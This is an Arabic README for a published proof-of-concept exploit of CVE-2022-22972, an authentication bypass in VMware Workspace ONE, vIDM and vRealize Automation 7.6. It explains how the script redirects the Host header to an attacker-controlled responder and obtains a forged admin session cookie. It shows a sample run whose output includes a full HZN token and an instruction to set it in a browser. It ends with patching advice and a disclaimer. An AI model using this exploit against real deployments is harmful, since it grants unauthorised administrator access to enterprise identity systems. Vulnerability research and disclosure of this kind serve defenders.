
إثبات مفهوم لاستغلال CVE-2022-22972 الذي يتجاوز المصادقة في VMware Workspace ONE وvIDM وvRealize Automation 7.6 عبر التلاعب برأس Host.
POC لـ CVE-2022-22972 الذي يؤثر على VMware Workspace ONE و vIDM و vRealize Automation 7.6.
يمكن العثور على تحليل تقني لجذر سبب الثغرة على مدونتنا: https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive
يمكن استخدام هذا السكربت لتجاوز المصادقة على vRealize Automation 7.6 باستخدام CVE-2022-22972. تمتلك Workspace ONE و vIDM نقطتي نهاية مصادقة مختلفتين، لكن جوهر الثغرة يظل كما هو. يسعدنا قبول طلبات السحب (pull requests) إذا كانت لديكم أجهزة اختبار للتحقق من التدفق.
يعمل هذا السكربت عن طريق تغيير ترويسة Host لطلب HTTP POST موجه إلى نقطة نهاية مصادقة VMware إلى Host يتحكم فيه المهاجم. يؤدي ذلك إلى قيام تطبيق VMware بالتواصل مع الـ Host حاملًا معلومات الاعتماد، وإذا أعاد الـ Host استجابة 200، يتم مصادقة المستخدم بنجاح.
ينتج عن هذا السكربت كوكي HZN يمكن تضمينها مع الطلبات اللاحقة لتنفيذ إجراءات بصفة المستخدم المخترَق.
ملاحظة: سترسل الوسائط الافتراضية للسكربت طلب المصادقة إلى بوابة AWS API الخاصة بنا والمهيأة للرد برمز 200 لنقطة النهاية المحددة المذكورة في المدونة. يمكنك تغيير ذلك باستخدام خيار --host. لن تتلقى نقطة النهاية هذه أي بيانات حساسة أثناء تدفق الاستغلال - فقط طلبًا من التطبيق الضعيف يحمل ترويسة المصادقة المزيفة التي ترد عليها.
dev@ubuntu:~/vmware/vra/exploit$ python3 CVE-2022-22972.py https://vra-app01.vra.intranet
Extracting state from vcac redirects...
Sending POST to auth endpoint
HZN=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJqdGkiOiJiM2E3MDJiOS01NjJkLTQwODgtYTg2Ny0xZjY5ZWE4YjAyZjMiLCJwcm4iOiJhZG1pbmlzdHJhdG9yQFZTUEhFUkUuTE9DQUwiLCJkb21haW4iOiJ2c3BoZXJlLmxvY2FsIiwidXNlcl9pZCI6IjMiLCJhdXRoX3RpbWUiOjE2NTM0MjUwOTAsImlzcyI6Imh0dHBzOi8vZWkzd3B0OTEwMC5leGVjdXRlLWFwaS51cy1lYXN0LTIuYW1hem9uYXdzLmNvbS9TQUFTL3QvdnNwaGVyZS5sb2NhbC9hdXRoIiwiYXVkIjoiaHR0cHM6Ly9laTN3cHQ5MTAwLmV4ZWN1dGUtYXBpLnVzLWVhc3QtMi5hbWF6b25hd3MuY29tL1NBQVMvdC92c3BoZXJlLmxvY2FsL2F1dGgvb2F1dGh0b2tlbiIsImN0eCI6Ilt7XCJtdGRcIjpcInVybjp2bXdhcmU6bmFtZXM6YWM6Y2xhc3NlczpMb2NhbFBhc3N3b3JkQXV0aFwiLFwiaWF0XCI6MTY1MzQyNTA5MCxcImlkXCI6M31dIiwic2NwIjoicHJvZmlsZSBhZG1pbiB1c2VyIGVtYWlsIG9wZXJhdG9yIiwiaWRwIjoiMiIsImVtbCI6ImFkbWluaXN0cmF0b3JAdnJhLWFwcDAxLnZyYS5pbnRyYW5ldCIsImNpZCI6IiIsImRpZCI6IiIsIndpZCI6IiIsInJ1bGVzIjp7ImV4cGlyeSI6MTY1MzQyNjg5MCwicnVsZXMiOlt7InJlc291cmNlcyI6WyIqIl0sImFjdGlvbnMiOlsiKiJdLCJjb25kaXRpb25zIjpudWxsfV0sImxpbmsiOm51bGx9LCJleHAiOjE2NTM0MjY4OTAsImlhdCI6MTY1MzQyNTA5MCwic3ViIjoiYWQzODkzODEtNTRmNS00ODFkLWFmNWEtOWZjNmIzOGI0NzQ0IiwicHJuX3R5cGUiOiJVU0VSIn0.Kkq2UnmqpW6yJb3GGCp7dSXc5PlU1y8YyDULIYLHIvYlB3OC4j5xFDy91a2tk4bi1lAUITymV-NUgweoCl15LXFVfBFYLEs-OAvMLKZhhGnFF-BrxmyYLPJutkxsi-gL0rF4VmYykuYw9tdUY2DghWiGGZ6QTYOts21QUzcvU-8
Set the HZN cookie in your browser to bypass authentication
قم بالتحديث إلى أحدث إصدار أو خفف من الثغرة باتباع التعليمات الواردة في VMSA
تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس المقصود استخدامه لمهاجمة الأنظمة إلا بموجب إذن صريح. القائمون على صيانة المشروع غير مسؤولين ولا يتحملون أي تبعة عن إساءة استخدام هذا البرنامج. استخدمه بمسؤولية.